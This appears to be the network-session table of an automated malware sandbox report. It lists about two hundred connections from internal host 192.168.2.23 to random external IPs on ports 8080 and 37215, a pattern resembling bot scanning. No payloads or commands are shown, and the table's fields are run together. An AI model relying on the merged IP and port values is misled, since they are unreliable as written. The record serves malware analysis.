                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8586192.168.2.234480818.22.1.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8587192.168.2.2346240188.122.46.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8588192.168.2.234501698.8.16.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8589192.168.2.2356052153.149.2.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8590192.168.2.2357104134.185.40.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8591192.168.2.2338954191.40.248.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8592192.168.2.2337900163.178.218.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8593192.168.2.235693418.30.14.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8594192.168.2.235402271.235.70.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8595192.168.2.2351238172.58.155.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8596192.168.2.2346384120.212.112.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8597192.168.2.2334840125.106.124.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8598192.168.2.2340902207.123.61.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8599192.168.2.2345608133.249.100.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8600192.168.2.235846035.158.179.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8601192.168.2.233716479.72.152.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8602192.168.2.2345244115.175.244.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8603192.168.2.2356128115.54.243.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8604192.168.2.2356726217.103.230.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8605192.168.2.2356238123.76.8.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8606192.168.2.2347620197.48.68.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8607192.168.2.2360598107.94.110.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8608192.168.2.2346040180.55.191.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8609192.168.2.233486873.104.129.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8610192.168.2.2348636179.84.119.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8611192.168.2.2358206174.75.136.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8612192.168.2.2345602222.6.116.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8613192.168.2.235683046.36.172.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8614192.168.2.236031688.5.169.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8615192.168.2.2340420128.57.90.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8616192.168.2.235717889.133.31.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8617192.168.2.2357618120.101.40.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8618192.168.2.23521789.59.201.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8619192.168.2.233988017.213.148.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8620192.168.2.235798692.49.187.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8621192.168.2.233730039.144.220.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8622192.168.2.2355504140.100.41.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8623192.168.2.2359266156.8.58.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8624192.168.2.233534896.58.207.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8625192.168.2.235432862.171.251.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8626192.168.2.2360020217.122.22.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8627192.168.2.233935275.67.162.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8628192.168.2.2342840129.153.52.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8629192.168.2.2352858208.255.247.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8630192.168.2.234956463.153.220.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8631192.168.2.235361643.95.40.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8632192.168.2.2358424195.100.130.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8633192.168.2.235621686.105.21.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8634192.168.2.2353472213.183.132.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8635192.168.2.235066652.245.254.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8636192.168.2.233588288.170.34.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8637192.168.2.2352058221.137.81.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8638192.168.2.2335898209.13.54.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8639192.168.2.23447481.11.29.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8640192.168.2.2345074200.230.220.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8641192.168.2.234538238.250.178.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8642192.168.2.2355452137.7.44.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8643192.168.2.234347837.93.220.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8644192.168.2.2332882134.3.29.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8645192.168.2.2357866207.48.177.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8646192.168.2.2355246182.143.219.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8647192.168.2.2350136113.80.185.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8648192.168.2.235119820.41.109.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8649192.168.2.23408485.113.173.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8650192.168.2.2334504195.238.200.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8651192.168.2.2349552201.122.130.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8652192.168.2.234533278.21.138.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8653192.168.2.235973489.132.165.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8654192.168.2.2359012220.125.218.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8655192.168.2.235257692.210.111.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8656192.168.2.2358814175.223.164.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8657192.168.2.233359450.32.19.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8658192.168.2.235588252.13.205.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8659192.168.2.2347712169.77.226.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8660192.168.2.2339038130.44.114.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8661192.168.2.233571065.12.144.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8662192.168.2.233675057.232.183.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8663192.168.2.234443077.234.214.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8664192.168.2.2339712114.150.67.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8665192.168.2.23435768.198.112.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8666192.168.2.234572631.64.25.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8667192.168.2.2349548126.6.1.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8668192.168.2.235595287.67.146.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8669192.168.2.233574234.173.243.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8670192.168.2.235654817.229.67.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8671192.168.2.2359460120.246.45.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8672192.168.2.2358956206.42.209.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8673192.168.2.2352126180.22.9.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8674192.168.2.23346468.147.104.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8675192.168.2.2351470164.168.110.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8676192.168.2.235887287.22.182.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8677192.168.2.2345580223.248.10.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8678192.168.2.23515421.235.220.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8679192.168.2.23567884.124.24.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8680192.168.2.2338860139.177.107.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8681192.168.2.234358888.191.33.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8682192.168.2.2355146128.127.5.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8683192.168.2.2355892144.177.227.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8684192.168.2.234112442.164.52.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8685192.168.2.234348836.141.56.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8686192.168.2.2333306173.214.14.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8687192.168.2.2348016164.154.207.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8688192.168.2.235674252.152.25.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8689192.168.2.23374942.220.250.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8690192.168.2.236012044.153.142.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8691192.168.2.2347916136.212.135.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8692192.168.2.23601544.170.162.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8693192.168.2.233658896.63.108.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8694192.168.2.235536044.222.174.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8695192.168.2.234697648.74.76.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8696192.168.2.234827891.118.102.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8697192.168.2.233685238.97.194.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8698192.168.2.235588869.146.23.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8699192.168.2.2347262188.86.126.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8700192.168.2.2352132169.165.203.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8701192.168.2.236060497.149.41.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8702192.168.2.2360442220.203.100.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8703192.168.2.2337478193.111.135.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8704192.168.2.2354378162.83.74.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8705192.168.2.235078031.187.21.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8706192.168.2.2352826169.179.21.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8707192.168.2.2351386158.48.32.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8708192.168.2.233501864.139.41.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8709192.168.2.2343810111.20.73.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8710192.168.2.233810812.140.18.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8711192.168.2.2343468105.219.235.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8712192.168.2.234617424.35.177.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8713192.168.2.234177641.103.7.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8714192.168.2.2356870118.16.123.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8715192.168.2.2357024190.206.147.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8716192.168.2.234750842.230.158.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8717192.168.2.2340828184.243.83.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8718192.168.2.2351498132.168.35.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8719192.168.2.233992236.68.50.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8720192.168.2.2355132131.97.240.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8721192.168.2.2351980148.112.44.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8722192.168.2.235485297.45.231.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8723192.168.2.23545102.136.18.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8724192.168.2.23572528.138.174.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8725192.168.2.2351440114.97.205.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8726192.168.2.233748438.196.195.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8727192.168.2.2337148195.24.37.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8728192.168.2.2339918172.176.179.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8729192.168.2.2341896171.182.204.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8730192.168.2.2333016185.19.127.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8731192.168.2.2332918155.230.134.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8732192.168.2.234687040.198.42.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8733192.168.2.234272224.25.59.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8734192.168.2.2340474202.170.121.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8735192.168.2.2359510169.133.71.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8736192.168.2.23398169.181.235.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8737192.168.2.2335100195.95.17.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8738192.168.2.2359368149.4.100.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8739192.168.2.234439898.234.82.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8740192.168.2.2333854145.230.142.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8741192.168.2.2352718160.139.139.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8742192.168.2.2353738167.83.153.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8743192.168.2.233292479.12.172.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8744192.168.2.234523693.158.25.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8745192.168.2.235688671.138.117.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8746192.168.2.2341234158.9.120.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8747192.168.2.2355744132.134.14.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8748192.168.2.2337946102.151.81.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8749192.168.2.2337010154.187.96.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8750192.168.2.233509891.194.34.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8751192.168.2.233868039.141.100.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8752192.168.2.233545865.220.117.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8753192.168.2.235036469.6.157.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8754192.168.2.234237424.163.187.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8755192.168.2.235768264.69.29.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8756192.168.2.2349514201.184.179.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8757192.168.2.235644083.164.58.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8758192.168.2.235237471.192.110.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8759192.168.2.235841036.132.156.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8760192.168.2.2353896101.40.159.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8761192.168.2.2360984196.151.161.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8762192.168.2.2339612121.21.90.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8763192.168.2.2342254169.253.0.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8764192.168.2.233332814.150.132.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8765192.168.2.235642241.241.198.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8766192.168.2.234095441.21.111.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8767192.168.2.2349700197.22.176.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8768192.168.2.234675241.44.171.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8769192.168.2.2350760197.19.31.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8770192.168.2.235700441.156.74.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8771192.168.2.2352278157.120.100.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8772192.168.2.2353878107.136.185.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8773192.168.2.235316641.247.46.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8774192.168.2.2343172157.97.30.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8775192.168.2.2352154197.80.91.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8776192.168.2.235595441.137.147.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8777192.168.2.234303060.25.34.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8778192.168.2.2354736157.227.75.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8779192.168.2.235213441.186.67.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8780192.168.2.2337500197.144.77.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8781192.168.2.233973841.255.215.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8782192.168.2.235372441.47.224.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8783192.168.2.2340706157.217.168.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8784192.168.2.2348874157.169.11.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8785192.168.2.2356840157.147.7.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8786192.168.2.2356294197.84.109.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8787192.168.2.2339852149.212.188.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8788192.168.2.235075032.186.107.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8789192.168.2.2337980219.163.9.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8790192.168.2.2337148197.135.68.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8791192.168.2.235751641.45.215.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8792192.168.2.233277096.27.46.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8793192.168.2.2338100104.111.106.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8794192.168.2.234902441.91.213.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8795192.168.2.2360166157.180.181.7637215
                                                        TimestampBytes transferredDirectionData


